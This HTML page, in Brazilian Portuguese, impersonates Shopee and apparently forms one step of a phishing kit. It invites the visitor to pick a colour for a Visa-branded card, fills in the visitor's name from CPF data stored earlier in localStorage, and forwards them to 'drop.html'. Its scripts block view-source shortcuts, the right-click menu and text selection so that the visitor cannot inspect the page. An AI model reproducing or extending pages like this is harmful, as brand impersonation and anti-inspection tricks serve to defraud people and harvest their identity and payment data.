<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <script>
        function nextPage(page) {
            const currentUrl = new URL(window.location.href);

            const queryParams = currentUrl.search;

            window.location.href = page + queryParams;
        }
    </script>

    <meta charset="UTF-8">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1.0, max-scale=1.0">
    <style>
        .header {
            background: white;
            padding: 15px 0;
            text-align: center;
        }
        .main-content {
            max-width: 600px;
            background-color: white;
            text-align: center;
            padding: 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 30px auto;
        }
        .color-options {
            display: flex;
            justify-content: space-between;
            margin-bottom: 20px;
        }
        .color-options button {
            width: 50px;
            height: 50px;
            border-radius: 50%;
            border: 2px solid transparent;
            cursor: pointer;
            transition: border 0.3s ease;
        }
        .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }
        .footer p {
            margin: 0; /* Remove espa&ccedil;amento extra entre as linhas do rodap&eacute; */
        }
        .color-options button:hover {
            border-color: #6c63ff;
        }
        .color-options .selected {
            border-color: #6c63ff;
        }
        .btn-custom {
            background-color: #ee4d2d;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            margin-top: 20px;
        }
        .btn-custom:hover {
            background-color: #000;
        }
        .cartao-container {
            position: relative;
            display: inline-block;
        }
        .cartao {
            width: var(--cartao-width, 350px);
            height: var(--cartao-height, 200px);
            border-radius: 15px;
            background: var(--cartao-bg, #1e90ff);
            color: white;
            padding: 20px;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
            font-family: Arial, sans-serif;
            position: relative;
            overflow: hidden;
        }
        .imagem-chip {
            width: 35px;
            position: absolute;
            top: 40%;
            left: 15px;
            transform: translateY(-50%);
        }
        .imagem-lateral {
            width: 30px;
            position: absolute;
            top: 40%;
            left: 60px;
            transform: translateY(-50%);
        }
        .top-left-text {
            position: absolute;
            top: 15px;
            left: 15px;
            width: 100px;
        }
        .top-right-img {
            width: 50px;
            position: absolute;
            top: 15px;
            right: 15px;   

        }
        .card-details {
            display: flex;
            justify-content: space-between;
            position: absolute;
            bottom: 20px;
            width: 90%;
            left: 5%;
        }
        .titular {
            text-align: left;
        }
        .valido {
            text-align: right;
        }
        .titular p, .valido p {
            margin: 0;
            font-size: 10px; /* Tamanho da fonte para o texto */
        }
        .texto {
            font-size: 14px; /* Tamanho da fonte do texto "Titular do Cart&atilde;o" */
            text-transform: uppercase;
            color: #ffffff;
        }
    </style>
</head>
<script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Vers&otilde;es antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script>
<style>
/*desabilita a sele&ccedil;&atilde;o no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a sele&ccedil;&atilde;o nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a sele&ccedil;&atilde;o nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style>

<script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Vers&otilde;es antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>
<body>
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
    <div class="header">
        <img decoding="async" style="width: 120px;" src="https://logodownload.org/wp-content/uploads/2021/03/shopee-logo.png" alt="Imagem Centralizada">
    </div>
    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <h4 style="font-size: 20px;">Escolha o design do seu cart&atilde;o</h4> <!-- Defina o tamanho aqui -->
            <p style="font-size: 16px;">Selecione o estilo que mais combina com voc&ecirc;</p>
            <h6 style="font-size: 16px;">Escolha a cor do seu cart&atilde;o</h6>
            <div class="color-options">
                <button style="background-color: #000;" class="selected"></button>
                <button style="background-color: #8420b3;"></button>
                <button style="background-color: #ee4d2d;"></button>
                <button style="background-color: #0454cc;"></button>
            </div>
            <div class="cartao-container">
                <div class="cartao">
                    <img src="https://i.ibb.co/F6g3Cpd/Bank-1.png" alt="top-left-text" class="top-left-text">
                    <img src="https://i0.wp.com/americassbdc.org/wp-content/uploads/2021/05/Visa-logo-white.png?fit=900%2C291&ssl=1" alt="Top-right logo" class="top-right-img">
                    <img src="https://cdn.freebiesupply.com/logos/large/2x/chip-1-logo-png-transparent.png" alt="Chip do Cart&atilde;o" class="imagem-chip">
                    <img src="https://i.ibb.co/mG9n8wp/Design-sem-nome.png" alt="Lateral logo" class="imagem-lateral">
                    <div class="card-details">
                        <div class="titular">
                            <p class="texto">Titular do Cart&atilde;o</p>
                            <p id="titular-nome" style="font-size: 16px;">SEU NOME AQUI</p>
                        </div>
                        <div class="valido">
                            <p class="texto">V&aacute;lido At&eacute;</p>
                            <p id="valido-data" style="font-size: 14px;">01/32</p>
                        </div>
                    </div>
                </div>
            </div>
            <button class="btn-custom" onclick="nextPage('drop.html');">CONTINUAR</button>
        </div>
    </div>
    <!-- Footer -->
    <div class="footer">
Copyright &copy; 2025 Shopee. Todos os direitos reservados.<br>

Pol&iacute;tica de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>
</div>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        const dadosUsuario = JSON.parse(localStorage.getItem('dadosCPF'));
        if (dadosUsuario && dadosUsuario.nomeCompleto) {
            document.getElementById('titular-nome').innerText = dadosUsuario.nomeCompleto;
        } else {
            document.getElementById('titular-nome').innerText = "Nome Indispon&iacute;vel";
        }

        const corSelecionada = localStorage.getItem('cartaoCor');
        if (corSelecionada) {
            document.querySelector('.cartao').style.backgroundColor = corSelecionada;
            document.querySelector(`.color-options button[style*="${corSelecionada}"]`).classList.add('selected');
        }
    });

    const colorOptions = document.querySelectorAll('.color-options button');
    const cartao = document.querySelector('.cartao');

    colorOptions.forEach((button, index) => {
        button.addEventListener('click', () => {
            document.querySelector('.color-options .selected').classList.remove('selected');
            button.classList.add('selected');

            const colors = ['#000', '#8420b3', '#ee4d2d', '#0454cc'];
            const selectedColor = colors[index];

            cartao.style.background = selectedColor;
            localStorage.setItem('cartaoCor', selectedColor);
        });
    });
</script>
</body>
</html>
